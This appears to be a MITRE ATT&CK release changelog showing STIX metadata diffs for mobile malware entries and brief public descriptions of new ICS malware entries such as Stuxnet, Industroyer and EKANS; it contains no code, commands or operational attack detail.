STIX FieldOld valueNew Value
x_mitre_aliases['KeyRaider']
x_mitre_old_attack_idMOB-S0004
x_mitre_platforms['iOS']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0317] Marcher

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referenceshttps://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['Marcher']
x_mitre_old_attack_idMOB-S0033
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']MarcherProofpoint-Marcher
external_references[1]['description'](Citation: Proofpoint-Marcher)Proofpoint. (2017, November 3). Credential phishing and an Android banking Trojan combine in Austrian mobile attacks. Retrieved July 6, 2018.
x_mitre_version1.11.0
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Proofpoint-Marcher', 'description': 'Proofpoint. (2017, November 3). Credential phishing and an Android banking Trojan combine in Austrian mobile attacks. Retrieved July 6, 2018.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks'}

[S0303] MazarBOT

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['MazarBOT']
x_mitre_old_attack_idMOB-S0019
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0299] NotCompatible

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['NotCompatible']
x_mitre_old_attack_idMOB-S0015
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0286] OBAD

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['OBAD']
x_mitre_old_attack_idMOB-S0002
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0285] OldBoot

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['OldBoot']
x_mitre_old_attack_idMOB-S0001
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0291] PJApps

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['PJApps']
x_mitre_old_attack_idMOB-S0007
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0313] RuMMS

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['RuMMS']
x_mitre_old_attack_idMOB-S0029
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0294] ShiftyBug

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['ShiftyBug']
x_mitre_old_attack_idMOB-S0010
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0307] Trojan-SMS.AndroidOS.Agent.ao

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['Trojan-SMS.AndroidOS.Agent.ao']
x_mitre_old_attack_idMOB-S0023
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0306] Trojan-SMS.AndroidOS.FakeInst.a

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['Trojan-SMS.AndroidOS.FakeInst.a']
x_mitre_old_attack_idMOB-S0022
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0308] Trojan-SMS.AndroidOS.OpFake.a

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['Trojan-SMS.AndroidOS.OpFake.a']
x_mitre_old_attack_idMOB-S0024
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0312] WireLurker

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referenceshttps://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['WireLurker']
x_mitre_old_attack_idMOB-S0028
x_mitre_platforms['iOS']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['description'](Citation: PaloAlto-WireLurker)Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.
x_mitre_version1.11.0

[S0314] X-Agent for Android

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['X-Agent for Android']
x_mitre_old_attack_idMOB-S0030
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0298] Xbot

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['Xbot']
x_mitre_old_attack_idMOB-S0014
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0297] XcodeGhost

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['XcodeGhost']
x_mitre_old_attack_idMOB-S0013
x_mitre_platforms['iOS']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0311] YiSpecter

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['YiSpecter']
x_mitre_old_attack_idMOB-S0027
x_mitre_platforms['iOS']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0287] ZergHelper

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['ZergHelper']
x_mitre_old_attack_idMOB-S0003
x_mitre_platforms['iOS']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0
Metadata-only Changes

[S0310] ANDROIDOS_ANSERVER.A

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-S0026
values_changed
STIX FieldOld valueNew Value
modified2019-10-15 19:55:04.407000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[S0304] Android/Chuli.A

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-S0020
values_changed
STIX FieldOld valueNew Value
modified2019-10-15 20:31:25.864000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[S0323] Charger

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-S0039
values_changed
STIX FieldOld valueNew Value
modified2019-10-09 14:51:42.697000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[S0301] Dendroid

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-S0017
values_changed
STIX FieldOld valueNew Value
modified2020-09-29 13:24:14.934000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[S0320] DroidJack

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-S0036
values_changed
STIX FieldOld valueNew Value
modified2019-08-09 18:02:06.618000+00:002022-05-20 17:13:16.506000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[2]['source_name']Zscaler-SuperMarioRunProofpoint-Droidjack
external_references[2]['description']Viral Gandhi. (2017, January 12). Super Mario Run Malware #2 – DroidJack RAT. Retrieved January 20, 2017.Proofpoint. (2016, July 7). DroidJack Uses Side-Load…It's Super Effective! Backdoored Pokemon GO Android App Found. Retrieved January 20, 2017.
external_references[2]['url']https://www.zscaler.com/blogs/research/super-mario-run-malware-2-–-droidjack-rathttps://www.proofpoint.com/us/threat-insight/post/droidjack-uses-side-load-backdoored-pokemon-go-android-app
external_references[3]['source_name']Proofpoint-DroidjackZscaler-SuperMarioRun
external_references[3]['description']Proofpoint. (2016, July 7). DroidJack Uses Side-Load…It's Super Effective! Backdoored Pokemon GO Android App Found. Retrieved January 20, 2017.Viral Gandhi. (2017, January 12). Super Mario Run Malware #2 – DroidJack RAT. Retrieved January 20, 2017.
external_references[3]['url']https://www.proofpoint.com/us/threat-insight/post/droidjack-uses-side-load-backdoored-pokemon-go-android-apphttps://www.zscaler.com/blogs/security-research/super-mario-run-malware-2-droidjack-rat

[S0290] Gooligan

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-S0006
values_changed
STIX FieldOld valueNew Value
modified2019-10-10 15:18:50.693000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[S0316] Pegasus for Android

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-S0032
values_changed
STIX FieldOld valueNew Value
modified2019-08-09 17:52:31.636000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[S0289] Pegasus for iOS

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-S0005
values_changed
STIX FieldOld valueNew Value
modified2020-01-24 13:55:33.492000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[S0295] RCSAndroid

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-S0011
values_changed
STIX FieldOld valueNew Value
modified2019-10-10 15:22:52.282000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[S0326] RedDrop

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-S0042
values_changed
STIX FieldOld valueNew Value
modified2019-10-15 19:56:13.028000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[S0327] Skygofree

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-S0043
values_changed
STIX FieldOld valueNew Value
modified2019-10-15 19:33:42.064000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[S0324] SpyDealer

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-S0040
values_changed
STIX FieldOld valueNew Value
modified2019-10-15 19:37:21.120000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[S0305] SpyNote RAT

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-S0021
values_changed
STIX FieldOld valueNew Value
modified2019-10-10 15:24:08.969000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[S0328] Stealth Mango

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-S0044
values_changed
STIX FieldOld valueNew Value
modified2020-09-11 15:55:43.283000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[S0329] Tangelo

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-S0045
values_changed
STIX FieldOld valueNew Value
modified2019-10-10 15:27:21.781000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[S0302] Twitoor

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-S0018
values_changed
STIX FieldOld valueNew Value
modified2020-09-30 13:19:59.692000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[S0318] XLoader for Android

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-S0034
values_changed
STIX FieldOld valueNew Value
modified2020-10-16 01:46:53.625000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

ics-attack

New Software

[S1001] Bad Rabbit

Current version: 1.0

Description: [Bad Rabbit](https://collaborate.mitre.org/attackics/index.php/Software/S0005) is a self-propagating (“wormable”) ransomware that affected the transportation sector in Ukraine. (Citation: ESET Bad Rabbit Oct 2017)


[S1002] BlackEnergy 3

Current version: 1.0

Description: [BlackEnergy 3](https://collaborate.mitre.org/attackics/index.php/Software/S0004) is a malware toolkit that has been used by both criminal and APT actors. It support various plug-ins including a variant of KillDisk. It is known to have been used against the Ukrainian power grid. (Citation: Booz Allen Hamilton)


[S1003] Conficker

Current version: 1.0

Description: [Conficker](https://collaborate.mitre.org/attackics/index.php/Software/S0012) is a computer worm that targets Microsoft Windows and was first detected in November 2008. It targets a vulnerability (MS08-067) in Windows OS software and dictionary attacks on administrator passwords to propagate while forming a botnet. Conficker made its way onto computers and removable disk drives in a nuclear power plant. (Citation: Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary)


[S0017] EKANS

Current version: 1.0

Description: [EKANS](https://collaborate.mitre.org/attackics/index.php/Software/S0017) is ransomware that was first seen December 2019 and later reported to have impacted operations at Honda automotive production facilities.(Citation: Forbes Snake Ransomware June 2020)(Citation: MalwareByes Honda and Enel Ransomware June 2020)(Citation: Dragos EKANS February 2020) EKANS has a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy historian, Honeywell HMIWeb).(Citation: Dragos EKANS February 2020) If the malware discovers these processes on the target system, it will stop, encrypt, and rename the process to prevent the program from restarting. This malware should not be confused with the “Snake” malware associated with the Turla group. The ICS processes documented within the malware’s kill-list is similar to those defined by the MEGACORTEX software.(Citation: FireEye OT Ransomware July 2020)(Citation: Pylos January 2020)(Citation: Dragos EKANS June 2020)The ransomware was initially reported as “Snake”, however, to avoid confusion with the unrelated Turla APT group security researchers spelled it backwards as EKANS.


[S1045] INCONTROLLER

Current version: 1.0

Description: [INCONTROLLER](https://attack.mitre.org/software/S1045) is custom malware that includes multiple modules tailored towards ICS devices and technologies, including Schneider Electric and Omron PLCs as well as OPC UA, Modbus, and CODESYS protocols. [INCONTROLLER](https://attack.mitre.org/software/S1045) has the ability to discover specific devices, download logic on the devices, and exploit platform-specific vulnerabilities. As of September 2022, some security researchers assessed [INCONTROLLER](https://attack.mitre.org/software/S1045) was developed by CHERNOVITE.(Citation: CISA-AA22-103A)(Citation: Brubaker-Incontroller)(Citation: Dragos-Pipedream)(Citation: Schneider-Incontroller)(Citation: Wylie-22)


[S1004] Industroyer

Current version: 1.0

Description: [Industroyer](https://collaborate.mitre.org/attackics/index.php/Software/S0001) is a sophisticated piece of malware designed to cause an [Impact](https://collaborate.mitre.org/attackics/index.php/Impact) to the working processes of Industrial Control Systems (ICS), specifically ICSs used in electrical substations.(Citation: ESET Win32/Industroyer) Industroyer was alleged to be used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride)(Citation: CISA Alert (TA17-163A))(Citation: Dragos Crashoverride 2018)(Citation: Dragos Crashoverride 2019)


[S1005] Killdisk

Current version: 1.0

Description: In 2015 the BlackEnergy malware contained a component called KillDisk. KillDisk's main functionality is to overwrite files with random data, rendering the OS unbootable. (Citation: ESET BlackEnergy Jan 2016)


[S1008] Stuxnet

Current version: 1.0

Description: [Stuxnet](https://collaborate.mitre.org/attackics/index.php/Software/S0010) was the first publicly reported piece of malware to specifically target industrial control systems devices. Stuxnet is a large and complex piece of malware that utilized multiple different complex tactics including multiple zero-day vulnerabilites, a sophisticated Windows rootkit, and network infection routines.(Citation: Wired W32.Stuxnet Dossier Feb 2011)(Citation: Symantec W32.Stuxnet Writeup)(Citation: CISA ICS Advisory (ICSA-10-238-01B))(Citation: SCADAhacker Stuxnet Mitigation Jan 2014)

Major Version Changes

[S0093] Backdoor.Oldrea

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) it1[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) i
>s a backdoor used by [Dragonfly](https://attack.mitre.org/gr>s a modular backdoor that used by [Dragonfly](https://attack
>oups/G0035). It appears to be custom malware authored by the>.mitre.org/groups/G0035) against energy companies since at l
> group or specifically for it. (Citation: Symantec Dragonfly>east 2013. [Backdoor.Oldrea](https://attack.mitre.org/softwa
>)>re/S0093) was distributed via supply chain compromise, and i
 >ncluded specialized modules to enumerate and map ICS-specifi
 >c systems, processes, and protocols.(Citation: Symantec Drag
 >onfly)(Citation: Gigamon Berserk Bear October 2021)(Citation
 >: Symantec Dragonfly Sept 2017)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 02:49:50.902000+00:002022-10-12 17:18:25.971000+00:00
description[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a backdoor used by [Dragonfly](https://attack.mitre.org/groups/G0035). It appears to be custom malware authored by the group or specifically for it. (Citation: Symantec Dragonfly)[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a modular backdoor that used by [Dragonfly](https://attack.mitre.org/groups/G0035) against energy companies since at least 2013. [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)(Citation: Symantec Dragonfly Sept 2017)
external_references[1]['source_name']Symantec DragonflyGigamon Berserk Bear October 2021
external_references[1]['description']Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.
external_references[1]['url']http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdfhttps://vblocalhost.com/uploads/VB2021-Slowik.pdf
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Symantec Dragonfly Sept 2017', 'description': 'Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.', 'url': 'https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers'}
external_references{'source_name': 'Symantec Dragonfly', 'description': 'Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.', 'url': 'https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments'}

[S0605] EKANS

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1[EKANS](https://attack.mitre.org/software/S0605) is ransomwat1[EKANS](https://attack.mitre.org/software/S0605) is ransomwa
>re variant that first appeared in mid-December 2019. [EKANS]>re variant written in Golang that first appeared in mid-Dece
>(https://attack.mitre.org/software/S0605) is distinct from o>mber 2019 and has been used against multiple sectors, includ
